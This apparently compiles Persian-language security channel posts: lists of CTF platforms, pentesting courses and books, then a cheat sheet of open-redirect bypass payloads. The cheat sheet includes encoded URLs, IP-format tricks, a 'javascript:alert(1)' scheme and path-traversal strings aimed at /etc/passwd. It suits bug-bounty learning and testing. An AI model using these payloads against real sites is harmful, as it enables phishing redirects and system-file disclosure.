🎯معرفی پلتفرم های CTF بر اساس سطح سختی 🎯

🟢 مبتدی:
🔗 picoCTF
🔗 TryHackMe
🔗 CTFlearn
🔗 Hacker101 CTF
🔗 LegitBS
🔗 OverTheWire
🔗 Crackmes.one
🔗 CyberTalents
🕳🕳🕳🕳🕳🕳🕳🕳🕳🕳🕳

🟡 سطح متوسط:
🔗 TryHackMe
🔗 Flare-On
🔗 CTFtime
🔗 Pwn College
🔗 OWASP WebGoat
🔗 PentesterLab
🔗 CMD Challenge
🔗 Hacksplaining
🕳🕳🕳🕳🕳🕳🕳🕳🕳🕳🕳

🔴 پیشرفته:
🔗 Hack The Box
🔗 root-me   🌟🌟
🔗 VulnHub   🌟🌟
🔗 Exploit Exercises
🔗 PortSwigger Web Security  🌟🌟
🔗 Challenges.re
🔗 CryptoHack
🔗 CryptoPals
🔗 Rubiya CTF
🕳🕳🕳🕳🕳🕳🕳🕳🕳🕳🕳

🟣 حرفه‌ای:
🔗 UnderTheWire 
🔗 AttackDefense 
🔗 FBCTF GitHub Archive 
🔗 Awesome CTF GitHub 
🔗 Awesome CTF Resources GitHub 
🔗 Guy in a Tuxedo GitHub
🔗 Pwn.tn
🔗 SmashTheStack
🕳🕳🕳🕳🕳🕳🕳🕳🕳🕳🕳

با هر سطحی که باشی، یکی از این پلتفرم‌ها حتماً به کارت میاد! 🚀

#CTF #امنیت_سایبری #آموزش

- Network Course: MCSA, CCNA 200-301, LPIC 1
- CEH
- PWK
دوره‌های استاندارد:
- MSFU or SANS 580
- WiFu or SANS 617
- ECSA
- LPT
- AWE (Offensive-Security)
- SANS 504
- SANS 560
- SANS 660
- SANS 760
- SANS 573 (Python for Information Security)
کتاب‌ها و منابع دیگر:
- دوره Network Pentesting از پنتستر آکادمی
- دوره تست نفوذ با Metasploit از Pentester Academy
- دوره تست نفوذ Active Directory از Pentester Academy
- دوره Python For Pentesters از پنتستر آکادمی
- دوره eJPT از elearn security
- دوره eCPPTv2 از elearn security
- دوره eCPTX از elearn security
- دوره Network Penetration Testing Ethical Hacking from Scratch از یودمی
- دوره Advanced Network Pentesting Practical Tutorials از یودمی
- دوره Python For Offensive Pentest از یودمی
- کتاب Black Hat Python نوشته Justin Seitz و Tim Arnold
- کتاب The Art Of Exploitation نوشته Jon Erickson
- کتاب The Science of Human Hacking نوشته Christopher Hadnagy
- کتاب Attacking Network Protocols: Capture, Analysis & Exploitation نوشته  James Forshaw
- کتاب The Hacker Playbook 1: Practical Guide To Penetration Testing
- کتاب The Hacker Playbook 2: Practical Guide To Penetration Testing
- کتاب The Hacker Playbook 3: Practical Guide To Penetration Testing نوشته  Peter Kim
- کتاب Penetration Testing: A Hands-on Introduction to Hacking
- کتاب Metasploit the penetration tester's guide

💡 ترفندهای موثر برای بای‌پس Open Redirect
اگه با Open Redirect سر و کار داری، این ترفندها می‌تونن بهت کمک کنن تا بای‌پس‌های موثری ایجاد کنی:

1. تزریق Null-byte

- /google.com%00/
- //google.com%00

2. رمزگذاری Base64

- aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ==
- //base64:d3d3Lmdvb2dsZS5jb20=/

3. تغییر حساس به حروف بزرگ و کوچک

- //GOOGLE.com/
- //GoOgLe.com/

4. رشته‌های UTF-8 بیش از حد طولانی

- %C0%AE%C0%AE%2F
- %C0%AF%C0%AF%2F%2Fgoogle.com

5. روش‌های ترکیبی رمزگذاری

- /%68%74%74%70://google.com
- //base64:%32%46%32%46%67%6F%6F%67%6C%65%2E%63%6F%6D

6. روش‌های مختلف نوشتن دامنه

- //[email protected]/
- //127.0.0.1.xip.io/

7. کاراکترهای خاص در انتها
- //google.com/#/
- //google.com/;&/

8. فرمت هشت‌گانه آدرس IP

- https://0177.0.0.1/
- https://00177.0000.0000.0001/

9. انواع آدرس‌های IP
- https://3232235777
- https://0xC0A80001

10. مسیر‌یابی با رمزگذاری
- /..%252f..%252f..%252fetc/passwd
- /%252e%252e/%252e%252e/%252e%252e/etc/passwd

11. استفاده از پروتکل‌های جایگزین

- ftp://google.com/
- javascript:alert(1)//google.com

12. آدرس‌های پروتکل نسبی

- :////google.com/
- :///google.com/

13. موارد لبه در ریدایرکت‌ها

- //google.com/?q=//bing.com/
- //google.com?q=https://another-site.com/

14. نوشتار IPv6

- https://[::1]/
- https://[::ffff:192.168.1.1]/

15. دو بار رمزگذاری آدرس URL

- %252f%252fgoogle.com
- %255cgoogle.com

16. ترکیب مسیردهی و رمزگذاری

- /%2E%2E/%2E%2E/etc/passwd
- /%2e%2e%5c%2e%2e/etc/passwd

17. ردیابی DNS معکوس

- https://google.com.reverselookup.com
- //lookup-reversed.google.com/

18. پورت‌های غیرمعمول

- https://google.com:81/
- https://google.com:444/

19. مبهم‌سازی مسیر با Unicode
- /%E2%80%8Egoogle.com/
- /%C2%A0google.com/

20. مبهم‌سازی پارامترهای Query

- //google.com/?q=https://another-site.com/
- //google.com/?redirect=https://google.com/

21. استفاده از نماد @ برای userinfo

- https://admin:[email protected]/
- https://@google.com

22. ترکیب userinfo و مسیردهی

https://admin:[email protected]/../../etc/passwd


#OpenRedirect #BugBounty #PenTesting #CyberSecurity